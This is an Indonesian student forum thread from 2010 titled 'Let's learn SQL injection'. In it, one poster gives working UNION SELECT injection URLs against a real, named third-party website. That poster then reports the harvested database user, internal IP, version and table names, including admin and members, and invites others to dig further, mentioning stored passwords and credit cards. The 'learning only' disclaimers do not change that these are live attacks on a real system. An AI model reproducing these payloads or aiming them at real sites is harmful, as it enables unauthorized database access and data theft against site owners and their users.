Computer Engineering Community
Selamat Datang Di forum Computer Network Community
1. Yang penting niatin untuk bagi ilmu n informasi, tanpa mencela salah satu pihak
2. Disarankan mencantumkan foto untuk profil yg layak diliat, heee.. sopan bisa dipertanggung jawabkan
3. Disarankan gunain nama login yg familiar tujuannya untuk silaturahmi aja, kan ga enak kalo di panggil kodok, dll
4. Admin berhak menghapus edit atau me-Bend salah satu postingan yang kagak layak
5. Silahkan Om n Mbak masuk ke kolom Forum yang ditentukan, jadi biar rapi dilihat
misalnya ngomongin dota jangan forum security tapi games area.. karena sudah nemuin ada yg nanyak md5 d forum jarkom.. seharusnya itu d forum security...
6. Silahkan berikan masukan kritik n saran wat admin seputar Forum ini

Join the forum, it's quick and easy

Computer Engineering Community
Selamat Datang Di forum Computer Network Community
1. Yang penting niatin untuk bagi ilmu n informasi, tanpa mencela salah satu pihak
2. Disarankan mencantumkan foto untuk profil yg layak diliat, heee.. sopan bisa dipertanggung jawabkan
3. Disarankan gunain nama login yg familiar tujuannya untuk silaturahmi aja, kan ga enak kalo di panggil kodok, dll
4. Admin berhak menghapus edit atau me-Bend salah satu postingan yang kagak layak
5. Silahkan Om n Mbak masuk ke kolom Forum yang ditentukan, jadi biar rapi dilihat
misalnya ngomongin dota jangan forum security tapi games area.. karena sudah nemuin ada yg nanyak md5 d forum jarkom.. seharusnya itu d forum security...
6. Silahkan berikan masukan kritik n saran wat admin seputar Forum ini
Computer Engineering Community
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Belajar SQL Injection yukk..

5 posters

Go down

Belajar SQL Injection yukk.. Empty Belajar SQL Injection yukk..

Post  coklat 23rd August 2010, 02:09

coklat
coklat

Jumlah posting : 9
Join date : 19.08.10

Kembali Ke Atas Go down

Belajar SQL Injection yukk.. Empty Re: Belajar SQL Injection yukk..

Post  haryo 23rd August 2010, 20:49

coklat wrote:Ini contoh kasus SQL injection :

http://www.enterpriseacademy.co.uk/news_detail.php?ID=-15%20%20union%20select%201,2,3,4,5,6--

Yuk kita belajar bareng2
terus penelasannya gmn mas..heheheheheh Question Question
haryo
haryo

Jumlah posting : 32
Join date : 18.08.10
Age : 35
Lokasi : Cikarang

http://haryopie.blogspot.com

Kembali Ke Atas Go down

Belajar SQL Injection yukk.. Empty Re: Belajar SQL Injection yukk..

Post  coklat 23rd August 2010, 22:55

SQL
injection adalah sebuah aksi hacking yang dilakukan di aplikasi client
dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien
dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya
menggunakan database untuk penyimpanan data.


biasanya support pada mysql versi 5
aplikasi memiliki bug SQL Injection salah satunya adalah menggunakan perintah
and+1=1--
seumpama browser menampilkan angka 2 & 3, dan angka inilah yang
sering disebut dengan angka ajaib, karna angka tersebut adalah letak
colomn dimana attacker bisa melakukan injeksi lebih lanjut.
sebagai contoh :
> untuk melihat user dan versi database nya
http://www.enterpriseacademy.co.uk/news_detail.php?ID=-15%20%20union%20select%201,user%28%29,version%28%29,4,5,6--

dan akhirnya qta bisa meng-explore semua isi database tersebut

bayangin aj klo isi tabelnya adalah username, password, bahkan CC Belajar SQL Injection yukk.. Icon_twisted
Tp inget UU IT ya, bisa jd kasus ntar Belajar SQL Injection yukk.. Icon_lol

Dilarang merusak juga, buat pembelajaran doank

Silakan kakak2 yg laen sharing jg, maap klo ada yg salah. makhlum masih newbie Belajar SQL Injection yukk.. Icon_eek
coklat
coklat

Jumlah posting : 9
Join date : 19.08.10

Kembali Ke Atas Go down

Belajar SQL Injection yukk.. Empty Re: Belajar SQL Injection yukk..

Post  paijo0708 24th August 2010, 12:24

trus itu ne buk muncul kayak gini...

Belajar SQL Injection yukk.. Screenshotop

gimana penjelasanny itu????





Code:
keep trying
paijo0708
paijo0708

Jumlah posting : 11
Join date : 19.08.10

Kembali Ke Atas Go down

Belajar SQL Injection yukk.. Empty Re: Belajar SQL Injection yukk..

Post  coklat 24th August 2010, 20:40

nah tu kan dah keliatan
user database: enterpreseac --> enterpreseac@192.168.0.13
versi : 5.0.58

dg beberapa manipulasi pake sql sintax, qta bisa explore sampe jeroannya Twisted Evil

database : enterpreseac
tabel:
admin
business_categories
document_upload
link_toplevel_category
links
members
newsevents
sub_categories

isinya diexplore sendiri ya Twisted Evil

silakan dicoba, sambil jangan lupa nanya2 juga ke mbah google. tp untuk pembelajaran aj ya, jangan sampe merusak. awas tu UU IT
coklat
coklat

Jumlah posting : 9
Join date : 19.08.10

Kembali Ke Atas Go down

Belajar SQL Injection yukk.. Empty penuh cew

Post  Admin 25th August 2010, 21:34

wah forum ini d penuhin cew2 cantik, mudah2an jadi kenyataan di kehidupan nyata... jadi kan lebis\h semangat k kampus Twisted Evil Twisted Evil Twisted Evil Twisted Evil Twisted Evil
Laughing Laughing Laughing Laughing Laughing Laughing Laughing
Admin
Admin
Admin

Jumlah posting : 6
Join date : 18.08.10

https://cecpoltek.indonesianforum.net

Kembali Ke Atas Go down

Belajar SQL Injection yukk.. Empty Re: Belajar SQL Injection yukk..

Post  cezc 29th August 2010, 22:01

wew.... ini kan forum security,knp ada injek-injek an om??
hahaha lol!

cezc

Jumlah posting : 17
Join date : 19.08.10

Kembali Ke Atas Go down

Belajar SQL Injection yukk.. Empty Re: Belajar SQL Injection yukk..

Post  coklat 29th August 2010, 22:14

kan ada pepatah, klo pingin nangkep pencuri harus tau gmn ilmu mencurinya. Nah gmn qta bisa terapin security policy klo qta lom tau jenis serangannya termasuk caranya. itu cuma pendapat aku sih hehehe

aku jg masih belajar koq kakak, makanya judul threadnya "Belajar SQL Injection". pinginnya bisa share gt, termasuk pencegahannya. karena klo g salah ada yg buat judul PA tentang pencegahan SQL injection. Apalagi banyak kakak2 yg jago disini, ada jg dosen2 sapa tau ntar jadi nambah ilmu buat aku. Maklum masih newbie banget.
coklat
coklat

Jumlah posting : 9
Join date : 19.08.10

Kembali Ke Atas Go down

Belajar SQL Injection yukk.. Empty Re: Belajar SQL Injection yukk..

Post  haryo 30th August 2010, 21:06

coklat wrote:kan ada pepatah, klo pingin nangkep pencuri harus tau gmn ilmu mencurinya. Nah gmn qta bisa terapin security policy klo qta lom tau jenis serangannya termasuk caranya. itu cuma pendapat aku sih hehehe

aku jg masih belajar koq kakak, makanya judul threadnya "Belajar SQL Injection". pinginnya bisa share gt, termasuk pencegahannya. karena klo g salah ada yg buat judul PA tentang pencegahan SQL injection. Apalagi banyak kakak2 yg jago disini, ada jg dosen2 sapa tau ntar jadi nambah ilmu buat aku. Maklum masih newbie banget.
hei coklat... Evil or Very Mad Evil or Very Mad Evil or Very Mad Evil or Very Mad Evil or Very Mad Evil or Very Mad dosen2 poltek ganteng2 lho...wkwkwkwkwkwkwk
haryo
haryo

Jumlah posting : 32
Join date : 18.08.10
Age : 35
Lokasi : Cikarang

http://haryopie.blogspot.com

Kembali Ke Atas Go down

Belajar SQL Injection yukk.. Empty Re: Belajar SQL Injection yukk..

Post  cezc 31st August 2010, 23:59

make pangolin aje Sleep

cezc

Jumlah posting : 17
Join date : 19.08.10

Kembali Ke Atas Go down

Belajar SQL Injection yukk.. Empty Re: Belajar SQL Injection yukk..

Post  coklat 1st September 2010, 04:44

Pangolin tu apa kakak?? Tool SQLi ya?? Ajarin dunk master lom pernah pake. Bisa dishare kakak biar forum qta tambah rame dan bermanfaat

Tp benernya thread aku ini pingin lebih menekankan ke konsep SQLi sendiri, biar qta ga cuma jadi tool kiddies, mungkin malah qta bisa buat toolnya sendiri.
Sebagai contoh :
http://www.enterpriseacademy.co.uk/news_detail.php?ID=-15%20%20union%20select%201,2,3,4,5,6--
Nah sbenernya fungsi angka 1,2,3,4,5,6 tu buat apa? apakah pasti selalu 1,2,3,4,5,6
dan lain2. termasuk buq SQLi tu seperti apa?

Untuk tool SQLi ada banyak koq, schemafuzz, joomla.py, dll.

Ayo master cesz, sharing dunx (mode merayu on )
Very Happy Very Happy Very Happy
coklat
coklat

Jumlah posting : 9
Join date : 19.08.10

Kembali Ke Atas Go down

Belajar SQL Injection yukk.. Empty Re: Belajar SQL Injection yukk..

Post  Sponsored content


Sponsored content


Kembali Ke Atas Go down

Kembali Ke Atas

- Similar topics

 
Permissions in this forum:
Anda tidak dapat menjawab topik